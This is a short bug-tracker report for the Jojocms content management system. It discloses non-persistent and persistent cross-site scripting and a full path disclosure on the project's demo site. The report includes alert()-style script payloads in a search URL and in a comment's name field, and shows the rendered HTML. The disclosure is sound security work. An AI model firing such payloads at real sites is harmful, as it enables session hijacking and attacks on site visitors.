Welcome to the Jojocms project! We hope that Jojocms provides you with many hours of increased productivity. If you have any issues, this is the place to name them. For general Questions or Beginners help please visit http://www.jojocms.org/forums/.
PR1#134 - XSS & FPD
|
DetailsCross site scripting (non-persistent) and Full path disclosure: http://demo.jojocms.org/search/%3Cscript%3Ealert(%22wopa!%22)%3C/script%3E Cross site scripting (persistent): http://demo.jojocms.org/blog/1/welcome-to-jojocms/ HTTP HEADERS (I injected in 'name' variable): POST /blog/1/welcome-to-jojocms/ HTTP/1.1 RESULT: <div class="comment" id="article-comment-wrap-2"> <h4><a href="http://asd.net" target="new" rel="nofollow"><script>alert("XSS")</script></a><span class="date"> - Nov 5, 2008</span></h4> sorry, my english is not good :( |